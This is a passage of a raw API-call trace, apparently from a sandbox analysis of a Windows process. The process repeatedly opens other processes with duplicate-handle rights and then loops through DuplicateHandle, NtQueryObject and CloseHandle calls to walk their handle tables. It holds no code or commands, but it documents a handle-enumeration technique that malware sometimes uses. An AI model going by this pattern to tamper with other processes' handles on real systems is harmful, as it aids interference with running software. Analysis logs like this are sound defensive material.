bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.091] GetTickCount () returned 0xe862d8 [0113.092] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.092] GetTickCount () returned 0xe862d8 [0113.092] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.092] GetTickCount () returned 0xe862d8 [0113.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.092] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.092] GetTickCount () returned 0xe862d8 [0113.093] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.093] GetTickCount () returned 0xe862d8 [0113.093] CloseHandle (hObject=0x1b8) returned 1 [0113.093] GetTickCount () returned 0xe862d8 [0113.093] CloseHandle (hObject=0x198) returned 1 [0113.101] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.101] GetTickCount () returned 0xe862e7 [0113.101] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.101] GetTickCount () returned 0xe862e7 [0113.102] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.102] GetTickCount () returned 0xe862e7 [0113.102] GetTickCount () returned 0xe862e7 [0113.102] CloseHandle (hObject=0x1b8) returned 1 [0113.102] GetTickCount () returned 0xe862e7 [0113.102] CloseHandle (hObject=0x198) returned 1 [0113.102] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.102] GetTickCount () returned 0xe862e7 [0113.102] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.102] GetTickCount () returned 0xe862e7 [0113.102] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.102] GetTickCount () returned 0xe862e7 [0113.103] GetTickCount () returned 0xe862e7 [0113.103] CloseHandle (hObject=0x1b8) returned 1 [0113.103] GetTickCount () returned 0xe862e7 [0113.103] CloseHandle (hObject=0x198) returned 1 [0113.103] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.103] GetTickCount () returned 0xe862e7 [0113.103] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x10, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.103] GetTickCount () returned 0xe862e7 [0113.103] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.103] GetTickCount () returned 0xe862e7 [0113.103] GetTickCount () returned 0xe862e7 [0113.104] CloseHandle (hObject=0x1b8) returned 1 [0113.104] GetTickCount () returned 0xe862e7 [0113.104] CloseHandle (hObject=0x198) returned 1 [0113.104] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.104] GetTickCount () returned 0xe862e7 [0113.104] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x14, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.104] GetTickCount () returned 0xe862e7 [0113.104] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.104] GetTickCount () returned 0xe862e7 [0113.104] GetTickCount () returned 0xe862e7 [0113.104] CloseHandle (hObject=0x1b8) returned 1 [0113.104] GetTickCount () returned 0xe862e7 [0113.104] CloseHandle (hObject=0x198) returned 1 [0113.104] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.105] GetTickCount () returned 0xe862e7 [0113.105] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x18, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.105] GetTickCount () returned 0xe862e7 [0113.105] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.105] GetTickCount () returned 0xe862e7 [0113.105] GetTickCount () returned 0xe862e7 [0113.106] CloseHandle (hObject=0x1b8) returned 1 [0113.106] GetTickCount () returned 0xe862e7 [0113.106] CloseHandle (hObject=0x198) returned 1 [0113.106] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.106] GetTickCount () returned 0xe862e7 [0113.106] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.106] GetTickCount () returned 0xe862e7 [0113.106] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.106] GetTickCount () returned 0xe862e7 [0113.106] GetTickCount () returned 0xe862e7 [0113.106] CloseHandle (hObject=0x1b8) returned 1 [0113.107] GetTickCount () returned 0xe862e7 [0113.107] CloseHandle (hObject=0x198) returned 1 [0113.107] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.107] GetTickCount () returned 0xe862e7 [0113.107] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.107] GetTickCount () returned 0xe862e7 [0113.107] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.107] GetTickCount () returned 0xe862e7 [0113.107] GetTickCount () returned 0xe862e7 [0113.107] CloseHandle (hObject=0x1b8) returned 1 [0113.107] GetTickCount () returned 0xe862e7 [0113.107] CloseHandle (hObject=0x198) returned 1 [0113.107] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.107] GetTickCount () returned 0xe862e7 [0113.107] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x24, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.108] GetTickCount () returned 0xe862e7 [0113.108] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.108] GetTickCount () returned 0xe862e7 [0113.108] GetTickCount () returned 0xe862e7 [0113.108] CloseHandle (hObject=0x1b8) returned 1 [0113.108] GetTickCount () returned 0xe862e7 [0113.108] CloseHandle (hObject=0x198) returned 1 [0113.108] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.108] GetTickCount () returned 0xe862e7 [0113.108] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x28, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.108] GetTickCount () returned 0xe862e7 [0113.108] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.108] GetTickCount () returned 0xe862e7 [0113.109] GetTickCount () returned 0xe862e7 [0113.109] CloseHandle (hObject=0x1b8) returned 1 [0113.109] GetTickCount () returned 0xe862e7 [0113.109] CloseHandle (hObject=0x198) returned 1 [0113.109] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.109] GetTickCount () returned 0xe862e7 [0113.109] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.109] GetTickCount () returned 0xe862e7 [0113.109] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.109] GetTickCount () returned 0xe862e7 [0113.109] GetTickCount () returned 0xe862e7 [0113.109] CloseHandle (hObject=0x1b8) returned 1 [0113.109] GetTickCount () returned 0xe862e7 [0113.109] CloseHandle (hObject=0x198) returned 1 [0113.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.110] GetTickCount () returned 0xe862e7 [0113.110] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x30, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.110] GetTickCount () returned 0xe862e7 [0113.110] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.110] GetTickCount () returned 0xe862e7 [0113.110] GetTickCount () returned 0xe862e7 [0113.110] CloseHandle (hObject=0x1b8) returned 1 [0113.110] GetTickCount () returned 0xe862e7 [0113.110] CloseHandle (hObject=0x198) returned 1 [0113.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.110] GetTickCount () returned 0xe862e7 [0113.110] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x34, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.110] GetTickCount () returned 0xe862e7 [0113.110] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.111] GetTickCount () returned 0xe862e7 [0113.111] GetTickCount () returned 0xe862e7 [0113.111] CloseHandle (hObject=0x1b8) returned 1 [0113.111] GetTickCount () returned 0xe862e7 [0113.111] CloseHandle (hObject=0x198) returned 1 [0113.111] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.111] GetTickCount () returned 0xe862e7 [0113.111] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.111] GetTickCount () returned 0xe862e7 [0113.111] GetTickCount () returned 0xe862e7 [0113.111] CloseHandle (hObject=0x198) returned 1 [0113.111] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.111] GetTickCount () returned 0xe862e7 [0113.112] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.112] GetTickCount () returned 0xe862e7 [0113.112] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.112] GetTickCount () returned 0xe862e7 [0113.112] GetTickCount () returned 0xe862e7 [0113.112] CloseHandle (hObject=0x1b8) returned 1 [0113.112] GetTickCount () returned 0xe862e7 [0113.112] CloseHandle (hObject=0x198) returned 1 [0113.112] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.112] GetTickCount () returned 0xe862e7 [0113.112] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x40, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.112] GetTickCount () returned 0xe862e7 [0113.113] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.113] GetTickCount () returned 0xe862e7 [0113.113] GetTickCount () returned 0xe862e7 [0113.113] CloseHandle (hObject=0x1b8) returned 1 [0113.113] GetTickCount () returned 0xe862e7 [0113.113] CloseHandle (hObject=0x198) returned 1 [0113.113] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.113] GetTickCount () returned 0xe862e7 [0113.113] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x44, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.113] GetTickCount () returned 0xe862e7 [0113.113] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.113] GetTickCount () returned 0xe862e7 [0113.113] GetTickCount () returned 0xe862e7 [0113.113] CloseHandle (hObject=0x1b8) returned 1 [0113.114] GetTickCount () returned 0xe862e7 [0113.114] CloseHandle (hObject=0x198) returned 1 [0113.114] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.114] GetTickCount () returned 0xe862e7 [0113.114] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x48, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.114] GetTickCount () returned 0xe862e7 [0113.114] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.114] GetTickCount () returned 0xe862e7 [0113.114] GetTickCount () returned 0xe862e7 [0113.114] CloseHandle (hObject=0x1b8) returned 1 [0113.114] GetTickCount () returned 0xe862e7 [0113.114] CloseHandle (hObject=0x198) returned 1 [0113.114] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.114] GetTickCount () returned 0xe862e7 [0113.115] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.115] GetTickCount () returned 0xe862e7 [0113.115] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.115] GetTickCount () returned 0xe862e7 [0113.115] GetTickCount () returned 0xe862e7 [0113.115] CloseHandle (hObject=0x1b8) returned 1 [0113.115] GetTickCount () returned 0xe862e7 [0113.115] CloseHandle (hObject=0x198) returned 1 [0113.115] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.115] GetTickCount () returned 0xe862e7 [0113.115] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x50, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.115] GetTickCount () returned 0xe862e7 [0113.115] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.115] GetTickCount () returned 0xe862e7 [0113.115] GetTickCount () returned 0xe862e7 [0113.116] CloseHandle (hObject=0x1b8) returned 1 [0113.116] GetTickCount () returned 0xe862e7 [0113.116] CloseHandle (hObject=0x198) returned 1 [0113.116] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.116] GetTickCount () returned 0xe862e7 [0113.116] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x54, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.116] GetTickCount () returned 0xe862e7 [0113.119] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.119] GetTickCount () returned 0xe862f7 [0113.119] GetTickCount () returned 0xe862f7 [0113.119] CloseHandle (hObject=0x1b8) returned 1 [0113.119] GetTickCount () returned 0xe862f7 [0113.119] CloseHandle (hObject=0x198) returned 1 [0113.119] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.119] GetTickCount () returned 0xe862f7 [0113.119] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x58, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.119] GetTickCount () returned 0xe862f7 [0113.119] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.119] GetTickCount () returned 0xe862f7 [0113.120] GetTickCount () returned 0xe862f7 [0113.120] CloseHandle (hObject=0x1b8) returned 1 [0113.120] GetTickCount () returned 0xe862f7 [0113.120] CloseHandle (hObject=0x198) returned 1 [0113.120] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.120] GetTickCount () returned 0xe862f7 [0113.120] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.120] GetTickCount () returned 0xe862f7 [0113.120] GetTickCount () returned 0xe862f7 [0113.120] CloseHandle (hObject=0x198) returned 1 [0113.120] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.120] GetTickCount () returned 0xe862f7 [0113.120] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x60, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.120] GetTickCount () returned 0xe862f7 [0113.120] GetTickCount () returned 0xe862f7 [0113.121] CloseHandle (hObject=0x198) returned 1 [0113.121] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.121] GetTickCount () returned 0xe862f7 [0113.121] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x64, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.121] GetTickCount () returned 0xe862f7 [0113.121] GetTickCount () returned 0xe862f7 [0113.121] CloseHandle (hObject=0x198) returned 1 [0113.121] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.121] GetTickCount () returned 0xe862f7 [0113.121] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x68, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.121] GetTickCount () returned 0xe862f7 [0113.121] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.121] GetTickCount () returned 0xe862f7 [0113.121] GetTickCount () returned 0xe862f7 [0113.122] CloseHandle (hObject=0x1b8) returned 1 [0113.122] GetTickCount () returned 0xe862f7 [0113.122] CloseHandle (hObject=0x198) returned 1 [0113.122] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.122] GetTickCount () returned 0xe862f7 [0113.122] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.122] GetTickCount () returned 0xe862f7 [0113.122] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.122] GetTickCount () returned 0xe862f7 [0113.122] GetTickCount () returned 0xe862f7 [0113.122] CloseHandle (hObject=0x1b8) returned 1 [0113.122] GetTickCount () returned 0xe862f7 [0113.122] CloseHandle (hObject=0x198) returned 1 [0113.122] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.123] GetTickCount () returned 0xe862f7 [0113.123] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x70, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | 